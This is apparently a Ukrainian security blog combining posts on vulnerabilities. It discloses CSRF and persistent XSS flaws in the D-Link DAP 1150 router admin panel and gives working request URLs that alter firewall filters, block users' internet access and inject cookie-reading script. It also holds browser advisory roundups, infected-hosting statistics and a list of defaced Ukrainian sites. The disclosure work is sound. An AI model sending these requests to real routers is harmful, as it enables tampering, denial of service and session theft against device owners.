Websecurity - Веб безпека

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall / MAC-filter через CSRF можна додавати, редагувати та видаляти налаштування MAC-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=74&res_struct_size=0&res_pos=0

DoS атака через CSRF:

Додавши відповідні MAC-фільтри, можна заблокувати користувачам доступ в Інтернет через даний роутер. Для цього в полі mac треба вказати MAC-адресу пристрою, а в полі enable - DROP.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / MAC-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=0

CSRF (WASC-09):

В розділі Firewall / Virtual servers через CSRF можна додавати, редагувати та видаляти віртуальні сервери.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / Virtual servers. Атака відбувається через функції додавання та редагування в параметрі res_buf.

12.02.2014

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Численні пошкодження пам’яті, підвищення привілеїв, міжсайтовий доступ до даних.

• Многочисленные уязвимости безопасности в Microsoft Internet Explorer (деталі)

12.04.2014

Додаткова інформація.

• MS14-010 CVE-2014-0293 Technical Details and Code (деталі)

В підсумках хакерської активності в Уанеті в 2 півріччі 2013 я зазначав, що всього за цей період я виявив 96 інфікованих сайтів в Уанеті. Дані сайти хостилися на серверах різних хостінг провайдерів, як українських, так і закордонних.

Пропоную вам звіт про результати мого дослідження хостінгів, які розміщували інфіковані сайти в другому півріччі 2013 року. Багато з цих хостінг провайдерів робили це і в першому півріччі. Щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В другому півріччі минулого року наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Besthosting, Bizland, Colocall, Compubyte Limited, CrimeaInfocom, Datagroup, Delta-X, Digital Ventures, DMedia, Dream Line, eServer.ru, FastVPS, Goodnet, Golden Telecom, Hosting.ua, HostLife, Hetzner, Hvosting, ISPsystem, iWeb, Infocom, Internet Communications, Keyweb Online, KHRSA, Kyivstar, Langate, LeaseWeb, Mageal, Microsoft, MiroHost, NAU, Server.ua, PlusServer, Web-Com, Shantyr, TheHost, TW Telecom, UA Servers, UkrNet, Ukraine Host, VOLZ, Volia, Wnet, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

• Datagroup - 13 сайтів
• Delta-X - 9 сайтів
• Besthosting - 9 сайтів
• Hetzner - 6 сайтів
• Compubyte Limited - 4 сайтів
• Wnet - 4 сайтів
• FastVPS - 3 сайтів
• Kyivstar - 3 сайтів
• Colocall - 3 сайтів
• Server.ua - 2 сайтів

Були виявлені хостінги всіх 96 сайтів. Хоча деякі з цих сайтів в даний момент вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах), але за допомогою власної системи моніторингу я визначив хостерів під час виявлення цих інфікованих сайтів.

Виявлені численні уразливості безпеки в Apple Safari.

Уразливі версії: Apple Safari 6.1, Safari 7.0.

Численні пошкодження пам’яті, обхід обмежень.

• APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3 (деталі)

В даній добірці уразливості в веб додатках:

• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code (деталі)
• Multiple Cross-Site Scripting (XSS) in Claroline (деталі)
• SQL Injection in Dokeos (деталі)
• SQL Injection in Chamilo LMS (деталі)
• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dei.gov.ua (хакером Dr.SHA6H) - 27.02.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.brusyliv-rda.gov.ua (хакером d3b~X) - 02.03.2014 - похаканий державний сайт, файл хакера все ще розміщений на сайті
• http://ivooptyka.com.ua (хакером SiR Abdou) - 06.03.2014, зараз сайт вже виправлений адмінами
• http://www.aneda.com.ua (хакером DaiLexX) - 04.03.2014, зараз сайт вже виправлений адмінами
• http://c-g.dn.ua (хакерами з Holy Lycans) - 28.03.2014, зараз сайт закритий хостером

Виявлені DoS уразливості в Net-SNMP. Ця утиліта існує у вигляді стаціонарної програми та у вигляді Perl і Python модулей.

Уразливі версії: Net-SNMP 5.7.

Декілька DoS-умов.

• Vulnerabilities in Net-SNMP (деталі)

Виходячи з моїх звітів про веб додатки на інфікованих сайтах в 1 півріччі та веб додатки на інфікованих сайтах в 2 півріччі, я підведу підсумки. Та наведу загальну статистику про веб додатки на інфікованих сайтах в 2013 році.

Як я зазначав в своїх звітах про хакерську активність в Уанеті, в першому півріччі було інфіковано 130 сайтів, а в другому півріччі було інфіковано 96 сайтів. Всього 226 сайтів за 2013 рік. І з них на 125 сайтах вдалося виявити движки.

На перевірених в минулому році сайтах використовуються наступні движки:

Joomla - 59
DataLife Engine - 13
WordPress - 13
Drupal - 4
uCoz - 4
CMS - 3
CNCat - 2
eM&IS-manager - 2
Elite-Board - 2
Gloowi Engine - 2
I-Soft Bizness - 2
ocStore - 2
UGCS CMS - 2
ArtDesign CMS - 1
Artefact St. CMS - 1
Bitrix Site Manager - 1
CMS Danneo - 1
CMS IT-Project - 1
CodeIgniter - 1
Global Vision CMS - 1
Kohana - 1
MODx - 1
osCommerce - 1
PHP-Fusion - 1
SmallNuke - 1
vBulletin - 1
Vivvo CMS - 1
WebAsyst Shop-Script - 1

Зазначу, що трійка лідерів серед веб додатків у першому й другому півріччі була незмінною. Й відповідно в підсумкових результатах за весь рік.

Тобто майже всі інфіковані сайти, з числа працюючих, використовували опенсорс веб додатки. Більшість з них публічні відкриті CMS, але деякі й комерційні відкриті веб програми.

25.03.2014

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 27.0, Firefox ESR 24.3, Thunderbird 24.3, Seamonkey 2.24, NSS.

Переповнення буфера, пошкодження пам’яті, витік інформації, підвищення привілеїв, обхід захисту, несанкціонований доступ, підміна запитів.

• Vulnerability in NSS (деталі)
• Mozilla Foundation Security Advisory 2014-15 (деталі)
• Mozilla Foundation Security Advisory 2014-16 (деталі)
• Mozilla Foundation Security Advisory 2014-17 (деталі)
• Mozilla Foundation Security Advisory 2014-18 (деталі)
• Mozilla Foundation Security Advisory 2014-19 (деталі)
• Mozilla Foundation Security Advisory 2014-20 (деталі)
• Mozilla Foundation Security Advisory 2014-21 (деталі)
• Mozilla Foundation Security Advisory 2014-22 (деталі)
• Mozilla Foundation Security Advisory 2014-23 (деталі)
• Mozilla Foundation Security Advisory 2014-24 (деталі)
• Mozilla Foundation Security Advisory 2014-25 (деталі)
• Mozilla Foundation Security Advisory 2014-26 (деталі)
• Mozilla Foundation Security Advisory 2014-27 (деталі)
• Mozilla Foundation Security Advisory 2014-28 (деталі)
• Mozilla Foundation Security Advisory 2014-29 (деталі)
• Mozilla Foundation Security Advisory 2014-30 (деталі)
• Mozilla Foundation Security Advisory 2014-31 (деталі)
• Mozilla Foundation Security Advisory 2014-32 (деталі)

10.04.2014

Нова інформація.

• Mozilla Firefox “BumpChunk” Object Processing Use-after-free (Pwn2Own) (деталі)
• Firefox for Android Profile Directory Derandomization and Data Exfiltration (деталі)

В 2011 році - початку 2012 року я оприлюднив численні уразливості в D-Link DAP 1150 (декілька десятків). Тоді я оприлюднив уразливості в адмінці в режими точки доступу, а зараз розповім про дірки в режимі роутера.

Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall в підрозділі IP-filters через CSRF можна додавати, редагувати та видаляти налаштування IP-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / IP-filters.

Атака через функцію додавання в параметрі res_buf (в полях: Name, IP Addresses Source, Destination, Ports Source, Destination).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полі Name, але не в інших полях).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0